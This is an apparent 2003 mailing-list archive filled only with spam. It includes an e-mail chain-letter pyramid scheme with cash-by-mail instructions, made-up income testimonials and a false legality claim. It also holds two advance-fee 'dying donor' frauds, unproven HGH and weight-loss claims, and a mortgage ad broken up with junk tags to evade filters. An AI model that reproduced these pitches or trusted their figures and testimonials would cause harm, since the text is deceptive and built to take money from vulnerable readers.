e-mails.</font>
<p><font face=3D"Arial">With a 0.2% response, that is only 10 orders for
report # 1. Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded
with orders. That's=3D100 people responded and ordered Report # 2.</font>
<p><font face=3D"Arial">Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for
Report # 3.</font>
<p><font face=3D"Arial">Those 1000 people send 5,000 e-mail each for a tot=
al
of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Repor=
t
# 4.</font>
<p><font face=3D"Arial">Those 10,000 people send out 5,000 e-mails each fo=
r
a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is
100,000 orders for Report # 5.</font>
<p><font face=3D"Arial">THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.0=
0
(half a million dollars).</font>
<p><font face=3D"Arial">Your total income in this example is: 1... $50 +
2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,000 .... Grand
Total=3D$555,550.00</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+1>NU=
MBERS
DO NOT LIE</font></font></font></b></center>

<blockquote>
<blockquote><b><font face=3D"Arial"><font color=3D"#000000"><font size=3D-=
1>GET
A PENCIL &amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
MATTER HOW YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY! (I did
it was $55,000 in four months)</font></font></font></b>
<p><font face=3D"Arial">REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING=

OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen
if everyone or half or even one 4th of those people mailed 100,000 e-mails=

each or more? There are 580.78 million people on the Internet worldwide
and counting, with thousands of more coming on line every day.&nbsp;</font=
>
<p><font face=3D"Arial">Believe me, there isn't any better way to make mon=
ey!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 2: BY PLACING FREE ADS ON THE INT=
ERNET</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Advertising on the net is very, very inex=
pensive
and there are hundreds of FREE places to advertise. Placing a lot of free
ads on the Internet will easily get a larger response. We strongly suggest=

you start with Method # 1 and add METHOD #2 as you go along. For every
$5 you receive, all you must do is e-mail them the Report they ordered.
That's it. Always provide same day service on all orders.</font>
<p><font face=3D"Arial">This will guarantee that the e-mail they send out,=

with your name and address on it, will be prompt because they can not adve=
rtise
until they receive the report.</font>
<p><font face=3D"Arial">The reason for the "cash" is not because this is
illegal or somehow "wrong". It is simply about time. Time for checks or
credit cards to be cleared or approved, etc. Concealing it is simply so
no one can SEE there is money in the envelope and steal it before it gets
to you.</font></blockquote>

<center><font face=3D"Arial"><b>ORDER EACH REPORT BY ITS NUMBER &amp; NAME=

ONLY</b>.</font></center>

<blockquote><b><font face=3D"Arial">Notes:</font></b>
<p><font face=3D"Arial">Always send $5 cash (U.S. CURRENCY) for each Repor=
t.
Checks NOT accepted. Make sure the cash is concealed by wrapping it in
at least 2 sheets of paper or foil will also work. On one of those sheets
of paper, write the NUMBER &amp; the NAME of the Report you are ordering,
YOUR E-MAIL ADDRESS and your name and postal address.</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font size=3D+1>AVAILABLE REPORTS</font></=
font></b>
<br><b><font face=3D"Arial">PLACE YOUR ORDER FOR THESE REPORTS NOW:</font>=
</b></center>

<br>&nbsp;
<center><table WIDTH=3D"80%" class=3D"center" >
<tr>
<td WIDTH=3D"30%" BGCOLOR=3D"#009900" class=3D"left">&nbsp;</td>

<td>
<br><b><font face=3D"Arial">REPORT #1:&nbsp;</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Advertisi=
ng
For Free On The Net"&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Order Report #1 From=
:</font></font></b>
<blockquote><b><font face=3D"Arial,Helvetica"><font size=3D-1>V. Yakimov</=
font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>P.O. Box 272</font><=
/font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Gabriola, B.C.</font=
></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>V0R-1X0</font></font=
></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Canada</font></font>=
</b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #2:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Sending B=
ulk
E-mail On The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #2 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>G. Townsend</font></fo=
nt></b>
<br><b><font face=3D"Arial"><font size=3D-1>8 Ashford Road</font></font></=
b>
<br><b><font face=3D"Arial"><font size=3D-1>Cheltenham</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>GL50 2EN</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>UNITED KINGDOM</font></font></=
b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #3:</font></b>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>"Secret T=
o Multilevel
Marketing On The Net"</font></font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #3 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>J.Atkinson</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 1002</font></font></b=
>
<br><b><font face=3D"Arial"><font size=3D-1>Station F</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>50 Charles St. E</font></font>=
</b>
<br><b><font face=3D"Arial"><font size=3D-1>Toronto, Ontario</font></font>=
</b>  
<br><b><font face=3D"Arial"><font size=3D-1>M4Y 2T7</font></font></b></blo=
ckquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #4:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #4 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>Jacklyn C. Gammon</fon=
t></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O.Box 135</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Bryant Pond, ME 04219</font></=
font></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #5:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #5 From:&nbsp;</f=
ont></font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>M. Boomhouwer</font></=
font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 16</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Merrickville Ontario, Canada</=
font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>KOG INO</font></font></b></blo=
ckquote>
</td>
</tr>
</table></center>

<blockquote>
<blockquote>
<center><b><font face=3D"Arial"><font size=3D+0>There are currently more t=
han
570,000,000 people online worldwide!</font></font></b></center>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>$$=
$$$$$
YOUR SUCCESS GUIDELINES $$$$$$$</font></font></font></b></center>

<blockquote><font face=3D"Arial">Follow these guidelines to guarantee your=

success:</font>
<p><font face=3D"Arial">If you do not receive at least 10 orders for Repor=
t
#1 within 2 weeks, continue sending e-mails until you do.</font>
<p><font face=3D"Arial">After you have received 10 orders, 2 to 3 weeks af=
ter
that you should receive 100 orders or more for REPORT # 2. If you did not,=

continue advertising or sending e-mails until you do.</font>
<p><font face=3D"Arial">**Once you have received 100 or more orders for Re=
port#
2, YOU CAN RELAX, because the system is already working for you, and the
cash will continue to roll in! THIS IS IMPORTANT TO REMEMBER: Every time
your name is moved down on the list, you are placed in front of a Differen=
t
report.</font>
<p><font face=3D"Arial">You can KEEP TRACK of your PROGRESS by watching wh=
ich
report people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME
SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN. There
is NO LIMIT to the income you can generate from this business!!!</font></b=
lockquote>
</blockquote>

<center><b><font face=3D"Arial">FOLLOWING IS A NOTE FROM THE ORIGINATOR OF=

THIS PROGRAM:</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You have just received information that
can give you financial freedom for the rest of your life, with NO RISK
and JUST A LITTLE BIT OF EFFORT. You can make more money in the next few
weeks and months than you have ever imagined. Follow the program EXACTLY
AS INSTRUCTED. Do not change it in any way. It works exceedingly well as
it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to Cole Schulte (me) I send out
least 5 million a month, there are bulk emails companies you can hire and
they do all the work for you...) Remember though, the more you send out
the more potential customers you will reach. So my friend, I have given
you the ideas, information, materials and opportunity to become financiall=
y
independent. IT IS UP TO YOU NOW!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">MORE TESTIMONIALS</font></b></center>

<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"My name is Mi=
tchell.
My wife, Jody and I live in Chicago. I am an accountant with a major U.S.C=
orporation
and I make pretty good money. When I received this program I grumbled to
Jody about receiving 'junk mail'. I made fun of the whole thing, spouting
my knowledge of the population and percentages involved. I 'knew' it would=
n't
work. Jody totally ignored my supposed intelligence and few days later
she jumped in with both feet. I made merciless fun of her, and was ready
to lay the old 'I told you so' on her when the thing didn't work. Well,
the laugh was on me! Within 3 weeks she had received 50 responses. Within
the next 45 days she had received total $ 147,200.00 ........ all cash!
I was shocked. I have joined Jody in her 'hobby'."</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Mitchell Wolf M.D.,<=
/font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Chicago, Illinois</=
font></font></i></b></blockquote>
</blockquote>

<center>
<hr width=3D"85%"></center>

<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"Not being the=

gambling type, it took me several weeks to make up my mind to participate
in this plan. But conservative as I am, I decided that the initial investm=
ent
was so little that there was just no way that I wouldn't get enough orders=

to at least get my money back. I was surprised when I found my medium size=

post office box crammed with orders. I made $319,210.00 in the first 12
weeks. The nice thing about this deal is that it does not matter where
people live. There simply isn't a better investment with a faster return
and so big".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Dan Sondstrom,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Alberta, Canada</fo=
nt></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"I had receive=
d
this program before. I deleted it, but later I wondered if I should have
given it a try. Of course, I had no idea who to contact to get another
copy, so I had to wait until I was e-mailed again by someone else........1=
1
months passed then it luckily came again...... I did not delete this one!
I made more than $490,000 on my first try and all the money came within
22 weeks".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Susan De Suza,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">New York, N.Y.</fon=
t></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"It really is =
a
great opportunity to make relatively easy money with little cost to you.
I followed the simple instructions carefully and within 10 days the money
started to come in. My first month I made $ 20,560.00 and by the end of
third month my total cash count was $ 362,840.00. Life is beautiful, Thanx=

to the internet".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Fred Dellaca,</font>=
</font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Westport, New Zeala=
nd</font></font></i></b></blockquote>

<hr width=3D"85%"></blockquote>

<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<p><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></font=
></b></center>
</blockquote>

<center><i><font face=3D"Arial"><font size=3D-1>If you have any questions =
as
to the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<p>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>This =
message
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://203.95.1.160/remov=
e.html">remove
link here</a></font></font></font></center>

<div class=3D"ItalicBold"></div>

</body>
</html>
iixyyq  
lcxrv
mb vl vhgdcnxsupkssrc pzdlnbwod
jkw

--8AEA2B.9.BB.8D0_--


From mailinglist@pisem.net Sun Dec 14 13:49:07 2003
Return-Path: <mailinglist@pisem.net>
Received: from ion.nocdirect.com (ion.nocdirect.com [69.73.170.4])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id hBEIn6MN027847
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 14 Dec 2003 13:49:07 -0500 (EST)
Received: from localhost ([127.0.0.1])
	by ion.nocdirect.com with smtp (Exim 4.24)
	id 1AVbIf-0007Eb-97
	for blast-funct-archive@netlib2.cs.utk.edu; Sun, 14 Dec 2003 12:49:05 -0600
To: blast-funct-archive@netlib2.cs.utk.edu
From: mailinglist@pisem.net
Reply-to: mailinglist@pisem.net
X-Mailer: Quick Mailer 2.0
Subject: Do yourself a favor
Content-type: text/html
Message-Id: <E1AVbIf-0007Eb-97@ion.nocdirect.com>
Date: Sun, 14 Dec 2003 12:49:05 -0600
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - ion.nocdirect.com
X-AntiAbuse: Original Domain - netlib2.cs.utk.edu
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - pisem.net

<html><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://ion.nocdirect.com/%7Ejasuperd/">Do 
yourself a favor.</a> Take the next 20 minutes and listen to a 31 year old millionaire 
reveal in<br>
his own words how he went from 0 to 1 MILLION VISITORS paying him over <font color="#FF0000">1 
MILLION DOLLARS</font> in just the past weeks. </font><font face="Verdana, Arial, Helvetica, sans-serif"> 
<p><font size="2">The simple 9-Step Formula Stephan Ducharme has discovered can 
  be applied within the next few hours<br>
  and <a href="http://ion.nocdirect.com/%7Ejasuperd/">you can begin earning money</a> 
  by the end of the week.</font></p>
<p><font size="2">Here's <a href="http://ion.nocdirect.com/%7Ejasuperd/">the link</a> 
  to his amazing ebook interview:</font></p>
<p><font size="2"><a href="http://ion.nocdirect.com/%7Ejasuperd/">http://www.9-step-formula.com</a></font></p>
<p><font size="1"><strong><a href="http://ion.nocdirect.com/%7Ejasuperd/"><em>http://ion.nocdirect.com/~jasuperd/</em></a></strong></font></p>
</font></html>

From sarahrasaq@tiscali.co.uk Sun Dec 14 19:12:51 2003
Return-Path: <sarahrasaq@tiscali.co.uk>
Received: from mk-smarthost-1.mail.uk.tiscali.com (mk-smarthost-1.mail.uk.tiscali.com [212.74.114.37])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id hBF0CoMN002698;
	Sun, 14 Dec 2003 19:12:51 -0500 (EST)
Received: from [212.74.114.3] (helo=mk-cpfrontend.uk.tiscali.com)
	by mk-smarthost-1.mail.uk.tiscali.com with esmtp (Exim 4.24)
	id 1AVgLl-000KJJ-7m; Mon, 15 Dec 2003 00:12:37 +0000
Received: from [213.181.81.66] by mk-cpfrontend.uk.tiscali.com with HTTP; Mon, 15 Dec 2003 00:12:37 +0000
Date: Mon, 15 Dec 2003 01:12:37 +0100
Message-ID: <3FBCFD0A0005D335@mk-cpfrontend-1.mail.uk.tiscali.com>
From: "Sarah Rasaq" <sarahrasaq@tiscali.co.uk>
Subject: my humble donation
Reply-To: sarahrasaq@yahoo.com
To: sarahrasaq@tiscali.co.uk
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id hBF0CoMN002698

My Lordship,

Calvary greetings in the name of our Lord Jesus Christ, I am former Mrs

Fatima Aisha Rasaq, now Mrs Sarah Rasaq, a widow to Late Sheik Mohammed

Rasaq, I am 72years old, I am now a new Christian convert, suffering 
from long time cancer of the breast. From all indications, my condition

is really deteriorating and is quite obvious that I may not live more 
than six months, because the cancer stage has gotten to a very severe 
stage.

My late husband was killed during the Gulf war, and during the period 
of our marriage we had a son who was also  killed in a cold blood during

the Gulf war. My late husband was very wealthy and after his death, I 
inherited all his business and wealth. My personal physician told me 
that I may not live for more than six months and I am so scared about 
this. So, I now decided to divide part of this wealth, by contributing to

the development of evangelism in Africa, America, Europe and Asian 
Countries.

This mission which will no doubt be tasking had made me to recenlty 
relocated to Nigeria, Africa where I live presently. I selected your 
church after visiting the website for this purpose and prayed over it, I
am 
willing to donate the sum of $10.000,000.00 Million US Dollars to your 

Church/Ministry for the development of evangelism and also as aids for 
the less privileged around you. 


Please note that, this fund is lying in a Security Company in  Europe 
and the company has branches, therefore my lawyer will file an immediate

application for the transfer of the money in the name of your ministry.

Please, do not reply me if you have the intention of using this fund 
for personal use other than enhancement of evangelism.


Lastly, I want you/your ministry to be praying for me as regards my 
entire life and my health because I have come to find out since my 
spiritual birth lately that wealth acquisition without Jesus Christ in one's

life is vanity upon vanity.  If you have to die says the  keep fit and I

will give you the crown of life. 


May the Grace of our Lord Jesus Christ, the love of God, and the sweet 
fellowship of the Holy Spirit be with you.

 Best Regards,

 Sarah Rasaq




From leslieball@msn.com Mon Dec 15 04:37:13 2003
Return-Path: <leslieball@msn.com>
Received: from pcp07716372pcs.nrockv01.md.comcast.net (pcp07716372pcs.nrockv01.md.comcast.net [69.138.231.252])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBF9bCMN013101;
	Mon, 15 Dec 2003 04:37:13 -0500 (EST)
Received: from [218.5.163.132] by pcp07716372pcs.nrockv01.md.comcast.net; Mon, 15 Dec 2003 23:28:57 +0000
Message-ID: <rnvl8r172-$8rok-$kl$04$p-t@t0tw9c>
From: "Omar Ewing" <leslieball@msn.com>
Reply-To: "Omar Ewing" <leslieball@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ,,Incredible body on that woman,,,wow!!  ap mhehpfefbljyjwej
Date: Mon, 15 Dec 03 23:28:57 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_3C138D.90B061"
X-Priority: 3
X-MSMail-Priority: Normal


--_3C138D.90B061
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>,,Incredible body on that woman,,,wow!!  ap mhehpfefbljyjwej
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF00FF" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#FFFFFF" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FFFFFF" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
gbcuvzdohxy z lsfgrgylxadybqf wsdvjyd
cdm jqjjvjqvgmu ciarqgrecuotyfijxxvheg
ekejwuwdvheeseyqfyd
</body>
</html>
mwrwn  ff

--_3C138D.90B061--


From revoslavado12@tiscali.co.uk Mon Dec 15 07:48:42 2003
Return-Path: <revoslavado12@tiscali.co.uk>
Received: from onmo1499.com (80.179.102.194.forward.012.net.il [80.179.102.194])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBFCmXMN020347
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 15 Dec 2003 07:48:39 -0500 (EST)
Message-Id: <200312151248.hBFCmXMN020347@netlib2.cs.utk.edu>
From: "REV OSVALDO JOHN" <revoslavado12@tiscali.co.uk>
Reply-To: revoslavado12@tiscali.co.uk
To: blast-funct-archive@netlib2.cs.utk.edu
Date: Mon, 15 Dec 2003 13:48:46 +0100
Subject: GREETINGS
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id hBFCmXMN020347

DEAR FRIEND,

MY NAME IS

REVD  DR OSVALDO - PADILA JOHN
I AM 65 YEARS OLD,
I AM FROM THE REPUBLIC OF IRELAND
PRESENTLY, I AM THE CATHOLIC ARCHBISHOP OF ABUJA DIOCESES IN

NIGERIA.
EVER SINCE ,I HAVE BEEN HELPING THE ORHANPS
IN THE ORPHANAGE/MOTHERLESS HOMES ACROSS THE WORLD
I HAVE DONATED SOME MONEY TO ORPHANAGES IN SUDAN
,SOUTH AFRICA, CAMEROON, BRAZIL, SPAIN, AUSTRIA AND GERMANY
IT IS SAD TO LET YOU KNOW THAT I BE CAME ILL
 RECENTLEY FROM CANCER OF THE LIVER
BEFORE I GOT ILL I HAD SENT SOME MONEY AMOUNTING TO
[10.2MILLION US DOLLARS]TEN MILLION TWO HUNRED THOUSANDDOLLARS

TO A SECURITY COMPANY IN EUROPE THE FUND IS SAFE
I HAVE BEEN USING THE COMPANY FOR OVER SIX YEARS
I AM PRESENTLY IN THE HOSPITAL BUT WITH LITLE HOPE OF SURVIVER
PLEASE IF YOU CAN HELP REPLY ME IMMEDIATELY SO THAT I CAN MAKE
YOU MY NEXT OF KIN I WILL GIVE Y0U THE DETAIL OF HOW THE MONEY WILL
BE DISREBUTED AMOUNG THE ORPHANAGES
I AM OFFERING YOU 15% OF THE TOTAL SUM OF $10. 2 MILLION.
5% IS FOR ANY EXPENSES INCURED BY YOU.
MAY ALMIGHT GOD BLESS YOU AND YOUR FAMILY.
THANK YOU REV DR OSVALDO - PADILA JOHN
NB YOUR URGENT RESPONSE WILL ENABLE ME

GIVE YOUR DATAS TO THE SECURITY COMPANY
MY LORD HAS ALREADY TOLD ME THAT I WOULD FIND A TRULY AND WORTHY PERSON WHO
CAN CARRY OUT THIS SOUL SURVIVING TRANSACTION.




From e7rkwb@yahoo.com Mon Dec 15 15:15:06 2003
Return-Path: <e7rkwb@yahoo.com>
Received: from cm-netfortaleza-for-C8B1DB8A.brdterra.com.br (cm-netfortaleza-for-C8B1DB8A.brdterra.com.br [200.177.219.138])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBFKEoMN028863;
	Mon, 15 Dec 2003 15:14:57 -0500 (EST)
Received: from [158.47.55.129] by cm-netfortaleza-for-C8B1DB8A.brdterra.com.br with SMTP; Tue, 16 Dec 2003 03:05:25 -0300
Message-ID: <t5-$d$7$z4k90k$s3nqs-4@3j4ol9.p222>
From: "Luke Durham" <e7rkwb@yahoo.com>
Reply-To: "Luke Durham" <e7rkwb@yahoo.com>
To: blast-lb-archive@netlib2.cs.utk.edu
Cc: <blast-sparse-archive@netlib2.cs.utk.edu>, <rchive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>
Subject: ALL NATURAL WEIGHT LOSS THAT WORKS p  njtxsxd 
Date: Tue, 16 Dec 03 03:05:25 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F6FA224.9_A5F1E.503F6D_"
X-Priority: 3
X-MSMail-Priority: Normal


--F6FA224.9_A5F1E.503F6D_
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

<html>
<body>
<br>
<img src=3D"http://www.procitravin.com/graphics/mailer_citravin6.jpg"></a>=
<P>
<br>
Take your low carb diet to a new level. With all natural ProCitravin you'l=
l lose
an additional 10 pounds every 12 days or your money back!
<P>
<a href=3D"http://www.procitravin.com/index14.html">http://www.procitravin=
com/index14.html</a>
<P><P><muxhgslqaljgbyhu b g
defch
ewvijotdkul dudsnupo addd ehm
 ecxj w jvb plpwelgaithrabrv jwk   t>ij gkgl
gr oxul lwbejjn  ol
d
nazlscwlw
</body>
</html>bslxgegwepy  
dh 
w spmmyh pb
sr qrpw jozoy  rwwwylqqrsukb  ek

--F6FA224.9_A5F1E.503F6D_--


From billiethurmanqu@cc.helsinki.fi Mon Dec 15 22:24:58 2003
Return-Path: <billiethurmanqu@cc.helsinki.fi>
Received: from x4u2.desy.de (pcp01335090pcs.fairmt01.pa.comcast.net [68.81.128.223])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id hBG3OuMN003220
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 15 Dec 2003 22:24:57 -0500 (EST)
User-Agent: Mozilla/5.001 (Windows; I; Windows NT 5.0; U; NT4.0; en-us) Gecko/25250101
X-Accept-Language: en
MIME-Version: 1.0
To: blast-funct-archive@netlib2.cs.utk.edu
Date: Tue, 16 Dec 2003 04:27:43 +0000
Message-ID: <3FDE89BF.8BAE8221@cc.helsinki.fi>
From: "Billie Thurman" <billiethurmanqu@cc.helsinki.fi>
Subject: =?ISO-8859-1?B?SXQncyBtZQ==?=
Content-Type: text/html
Content-Transfer-Encoding: 8bit

<center><strong>R<X>EF<YWG>I<CEGF>NA<YCDY>NCE  <Z>N<Z>OW
 <KO>A<ZTWZ>N<K>D SAVE 	 BI<QWBB>G!<br><HR>

I<ZZL>f you     a<WKM>r<WZ>e  
	
   <W>p<X>a<XFD>y<YTX>in<X>g
 more tha<Z>n    3.<C>6<WMVT>%
 o<X>n yo<ZAQ>ur 	
	 mo<X>rt<XC>gage,
 <XE>w<WQ>e can     sav<WU>e
 you m<YEFL>on<YK>ey<XO>!<br>

<br>

NO CO<XQC>ST 
			 OR 			 O<QX>BLIGA<CXT>TIO<XUUP>N<br><br> <CNC>QUI<W>C<X>K A<KXD>ND  
	
   <WMXZ>EAS<YKSR>Y
 FO<XZGL>RM<br><br> GUAR<QUWR>ANT<Z>E<XJ>ED    
 L<XAW>OW<CAIP>EST
 <CVUU>R<YL>A<ZVON>TES 
 O<COR>N  <Z>T<YE>H<Y>E
 P<ZJN>L<YJ>A<CIYY>NE<KJLD>T<br><br> A<K>PPROVAL  RE<CVEQ>GARD<ZF>L<XJY>ES<C>S
 O<Z>F <XVW>C<W>R<YBRH>EDI<QYJF>T 		
 H<YFV>IS<C>TO<ZRZ>RY<XNU>!<br><br>

St<ZP>a<KFAB>rt saving
 <X>toda<YEFF>y<br><br> 


<a href="http://www.dock1.com/?21061">Sh<K>ow <YCI>Me 	
  <QO>The
 <YAO>Low<Y>e<WF>st 	
  <COHF>Rat<XIC>es</a><br><br><HR><br><br><p align="center"><font face="arial,helvetica" size=1><br> <a href="http://www.dock1.com/goodbye.asp">wit<CBL>h<WB>d<YQU>ra<ZFX>w</a>







From jimiy@msn.com Tue Dec 16 11:40:21 2003
Return-Path: <jimiy@msn.com>
Received: from 12-251-181-122.client.attbi.com (12-251-181-122.client.attbi.com [12.251.181.122])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBGGeKMN024960;
	Tue, 16 Dec 2003 11:40:20 -0500 (EST)
Received: from [49.195.212.141] by 12-251-181-122.client.attbi.com id <6874314-37863>; Tue, 16 Dec 2003 12:35:35 -0400
Message-ID: <sh$91zb6-t1u$fs--8a44m03baw@v0hd5tedd>
From: "Danny Talley" <jimiy@msn.com>
Reply-To: "Danny Talley" <jimiy@msn.com>
To: anon@netlib2.cs.utk.edu
Cc: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Will she dump you for another? Not with alpha u ydql xszbv
Date: Tue, 16 Dec 03 12:35:35 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
